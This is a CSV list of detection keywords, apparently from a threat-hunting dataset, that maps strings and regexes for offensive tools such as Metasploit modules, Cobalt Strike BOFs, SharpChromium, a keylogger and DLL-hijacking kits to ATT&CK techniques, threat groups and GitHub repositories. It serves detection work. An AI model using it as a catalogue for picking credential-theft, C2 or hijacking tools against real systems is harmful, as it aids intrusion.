"*ditty/ditty.c*",".{0,1000}ditty\/ditty\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z","41080"
"*Dive Shell - Emperor Hacking Team*",".{0,1000}Dive\sShell\s\-\sEmperor\sHacking\sTeam.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","41081"
"*diversenok/TokenUniverse*",".{0,1000}diversenok\/TokenUniverse.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","41082"
"*Diverto/IPPrintC2*",".{0,1000}Diverto\/IPPrintC2.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","1","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","41083"
"*djhohnstein/SharpChromium*",".{0,1000}djhohnstein\/SharpChromium.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","41084"
"*djhohnstein/SharpLogger*",".{0,1000}djhohnstein\/SharpLogger.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","1","N/A","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","41085"
"*djhohnstein/SharpSC*",".{0,1000}djhohnstein\/SharpSC.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","1","N/A","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","41086"
"*DKMC-master.zip*",".{0,1000}DKMC\-master\.zip.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","41087"
"*dl http://ipinfo.io 2>/dev/nul*",".{0,1000}dl\shttp\:\/\/ipinfo\.io\s2\>\/dev\/nul.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","41088"
"*DLHell v2.0*",".{0,1000}DLHell\sv2\.0.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","41090"
"*DLHell.py -*",".{0,1000}DLHell\.py\s\-.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","41091"
"*dlink_central_wifimanager_rce.*",".{0,1000}dlink_central_wifimanager_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41092"
"*dlink_sharecenter_cmd_exec*",".{0,1000}dlink_sharecenter_cmd_exec.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","41093"
"*dlink_telnet_backdoor_userpass*",".{0,1000}dlink_telnet_backdoor_userpass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41094"
"*Dliv3/Venom*",".{0,1000}Dliv3\/Venom.{0,1000}","offensive_tool_keyword","venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","41095"
"*DLL Hell - DLL Proxifier/Hijacker*",".{0,1000}DLL\sHell\s\-\sDLL\sProxifier\/Hijacker.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","41096"
"*DLL INJECTION EXECUTED SUCCESSFULLY :D*",".{0,1000}DLL\sINJECTION\sEXECUTED\sSUCCESSFULLY\s\:D.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","41097"
"*dll* [HIJACKABLE]*",".{0,1000}dll.{0,1000}\s\[HIJACKABLE\].{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","41098"
"*dll\reflective_dll.*",".{0,1000}dll\\reflective_dll\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","0","N/A","N/A","10","","N/A","","","","41099"
"*dll_generator.py*",".{0,1000}dll_generator\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","41100"
"*dll_hijack_detect_x64*",".{0,1000}dll_hijack_detect_x64.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","41101"
"*dll_hijack_detect_x86*",".{0,1000}dll_hijack_detect_x86.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","41102"
"*dll_hijack_hunter*",".{0,1000}dll_hijack_hunter.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","N/A","10","10","147","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z","41103"
"*DLL_Imports_BOF*",".{0,1000}DLL_Imports_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","N/A","10","10","85","11","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z","41104"
"*dll_inject.exe *",".{0,1000}dll_inject\.exe\s.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","41105"
"*dll_inject.rb*",".{0,1000}dll_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41106"
"*DLL_METASPLOIT_ATTACH*",".{0,1000}DLL_METASPLOIT_ATTACH.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","41107"
"*dll_spawn_cmd.cpp*",".{0,1000}dll_spawn_cmd\.cpp.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","41108"
"*dll_spawn_cmd.exe*",".{0,1000}dll_spawn_cmd\.exe.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","41109"
"*DLL_TO_HIJACK_WIN10*",".{0,1000}DLL_TO_HIJACK_WIN10.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","41110"
"*dllexploit.*",".{0,1000}dllexploit\..{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","41111"
"*DllExport -*",".{0,1000}DllExport\s\-.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","41112"
"*DLLHijackAuditKit*",".{0,1000}DLLHijackAuditKit.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41113"
"*DLLHijackAuditKit*",".{0,1000}DLLHijackAuditKit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41114"
"*DLLHijackAuditKit.zip*",".{0,1000}DLLHijackAuditKit\.zip.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41115"
"*DLL-Hijack-Search-Order-BOF*",".{0,1000}DLL\-Hijack\-Search\-Order\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","N/A","10","10","147","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z","41116"
"*DLLHijackTest.dll*",".{0,1000}DLLHijackTest\.dll.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","41117"
"*DLLHijackTest.sln*",".{0,1000}DLLHijackTest\.sln.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","41118"
"*DLLHijackTest-master*",".{0,1000}DLLHijackTest\-master.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","41119"
